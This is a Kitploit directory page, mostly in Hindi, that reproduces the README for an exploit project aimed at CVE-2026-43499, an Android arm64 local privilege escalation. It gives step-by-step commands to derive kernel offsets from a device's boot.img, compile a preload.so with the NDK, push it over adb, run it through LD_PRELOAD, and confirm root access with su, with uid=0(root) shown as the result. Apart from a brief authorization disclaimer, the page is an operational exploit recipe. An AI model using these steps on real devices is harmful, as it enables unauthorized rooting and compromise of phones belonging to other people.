Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-43499_HW-CLT-AL01 — boot.img से प्रति-डिवाइस कर्नेल ऑफसेट उत्पन्न करता है और CVE-2026-43499 Android arm64 स्थानीय विशेषाधिकार वृद्धि का शोषण करने के लिए एक प्रीलोड लाइब्रेरी संकलित करता है। | Kitploit
उपकरण/GitHubGitHub/zychen027/cve-2026-43499_hw-clt-al01
एंड्रॉइड सुरक्षाविशेषाधिकार वृद्धिशोषणमोबाइल सुरक्षापेलोड डेवलपमेंटफर्मवेयर विश्लेषणबाइनरी शोषण
GitHubzychen027/cve-2026-43499_hw-clt-al01

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-43499_HW-CLT-AL01

boot.img से प्रति-डिवाइस कर्नेल ऑफसेट उत्पन्न करता है और CVE-2026-43499 Android arm64 स्थानीय विशेषाधिकार वृद्धि का शोषण करने के लिए एक प्रीलोड लाइब्रेरी संकलित करता है।

रिपॉजिटरी देखें
211 महीना पहलेअभी तक समीक्षित नहीं

CVE-2026-43499 Android arm64 स्थानीय विशेषाधिकार वृद्धि अनुकूलन

English | चीनी


यह CVE-2026-43499 के लिए एक Android arm64 स्थानीय विशेषाधिकार वृद्धि अनुकूलन परियोजना है।

यह परियोजना लक्ष्य डिवाइस के boot.img और profile जानकारी के आधार पर target.h जनरेट करती है, और फिर संबंधित preload.so संकलित करती है।

नोट: यह परियोजना एक सामान्य अनुकूलन ढाँचा है, जो किसी एक डिवाइस मॉडल से बंधा नहीं है। यह वास्तव में काम करता है या नहीं, यह इस पर निर्भर करता है कि generate_target.py target.h को सफलतापूर्वक जनरेट कर पाता है या नहीं, और वास्तविक डिवाइस परीक्षण के परिणामों पर।


निर्देशिका संरचना

项目目录/
├── boot.img                   # 目标设备同固件 boot 镜像
├── profile.json               # 目标设备 profile
├── detect_offset.py           # 检测 profile 用
├── generate_target.py         # 生成 target.h
├── source/
│   ├── Makefile
│   └── src/
│       └── target.h           # 自动生成
└── source/build/bin/
    └── preload.so             # 编译产物

आवश्यक निर्भरताएँ

मूल निर्भरताएँ

Python 3
LLVM / llvm-objdump
Android NDK
make
adb

Windows के लिए अनुशंसित वातावरण

Windows पर निम्न का उपयोग करने की अनुशंसा की जाती है:

MSYS2 UCRT64
Android NDK r29
LLVM Windows x86_64

MSYS2 में make इंस्टॉल करने के लिए:

pacman -S make coreutils

फ़ाइलें तैयार करें

आपको निम्न तैयार करने की आवश्यकता है:

boot.img
profile.json

profile उदाहरण:

{
  "p0_phys_offset": "0x80000000",
  "p0_kernel_phys_load": "0xc7800000"
}

profile में ये दो पते:

p0_phys_offset
p0_kernel_phys_load

इन्हें पहले से Root किए गए और लक्ष्य boot.img के समान फ़र्मवेयर वाले फ़ोन पर स्क्रिप्ट चलाकर प्राप्त किया जा सकता है:

python3 detect_offset.py

Windows पर भी:

python detect_offset.py

उपयोग के चरण

1. प्रोजेक्ट निर्देशिका में प्रवेश करें

Linux / macOS:

cd PATH/project

Windows MSYS2 उदाहरण:

cd PATH/CVE-2026-43499-Poc-Analysis-main

2. NDK पथ सेट करें

Linux / macOS उदाहरण:

export ANDROID_NDK_HOME=PATH/android-ndk

Windows MSYS2 उदाहरण:

export ANDROID_NDK_HOME=PATH/android-ndk-r29

3. target.h जनरेट करें

python generate_target.py \
  --boot boot.img \
  --profile profile.json \
  -o source/src/target.h

या CMD में उपयोग करें:

python generate_target.py --boot boot.img --profile profile.json -o source/src/target.h

यदि llvm-objdump न मिलने का संकेत दिखे, तो पथ मैन्युअल रूप से निर्दिष्ट करें:

python generate_target.py \
  --boot boot.img \
  --profile profile.json \
  -o source/src/target.h \
  --llvm-objdump "PATH/clang+llvm-22.1.8-x86_64-pc-windows-msvc/bin/llvm-objdump.exe"

या CMD में उपयोग करें:

python generate_target.py --boot boot.img --profile profile.json -o source/src/target.h --llvm-objdump "PATH/clang+llvm-22.1.8-x86_64-pc-windows-msvc/bin/llvm-objdump.exe"

सफल होने पर कुछ इस प्रकार दिखाई देगा:

生成成功: .../source/src/target.h
kernel SHA-256: ...
target macros: ...

4. preload.so संकलित करें

Linux / macOS:

make -C source clean preload

Windows MSYS2:

make -C source clean preload NDK_PREBUILT=windows-x86_64

सफल होने पर निम्न जनरेट होगा:

source/build/bin/preload.so

5. डिवाइस पर पुश करें और चलाएँ

adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell "chmod 0644 /data/local/tmp/preload.so"
adb shell "LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true"

सत्यापन:

adb shell "/data/local/tmp/su -c 'id'"

सफल होने पर आमतौर पर यह दिखाई देगा:

uid=0(root) gid=0(root)

Windows MSYS2 वन-क्लिक प्रक्रिया

आपके पथ के अनुसार उदाहरण:

cd PATH/CVE-2026-43499-annibale-main
export ANDROID_NDK_HOME=PATH/android-ndk-r29
python generate_target.py --boot boot.img --profile profile.json -o source/src/target.h
make -C source clean preload NDK_PREBUILT=windows-x86_64

अंतिम फ़ाइल:

source/build/bin/preload.so

सामान्य प्रश्न

llvm-objdump नहीं मिल रहा

LLVM इंस्टॉल करें, या उपयोग करें:

--llvm-objdump "PATH/llvm-objdump"

make नहीं मिल रहा

Windows पर MSYS2 से इंस्टॉल करें:

pacman -S make coreutils

clang नहीं मिल रहा

आमतौर पर NDK पथ सही ढंग से कॉन्फ़िगर नहीं किया गया है।

Windows MSYS2 उदाहरण:

export ANDROID_NDK_HOME=PATH/android-ndk-r29
make -C source clean preload NDK_PREBUILT=windows-x86_64

target.h जनरेशन विफल

इसका आमतौर पर मतलब है कि वर्तमान boot.img या कर्नेल लेआउट अभी तक सफलतापूर्वक अनुकूलित नहीं हुआ है।

इन पर ध्यान केंद्रित करके जाँच करें:

boot.img 是否完整
profile 是否正确
llvm-objdump 是否可用
内核是否有 IKCONFIG / kallsyms / BTF

ध्यान दें

  • डिवाइस, सिस्टम या कर्नेल बदलने के बाद target.h को दोबारा जनरेट करना आवश्यक है।
  • target.h को मैन्युअल रूप से संपादित करने की अनुशंसा नहीं की जाती है; इसे generate_target.py द्वारा स्वचालित रूप से जनरेट किया जाना चाहिए।
  • कृपया केवल उन डिवाइसों और वातावरणों में उपयोग करें जिनके लिए आपके पास अधिकार है।
टूल डाउनलोड करें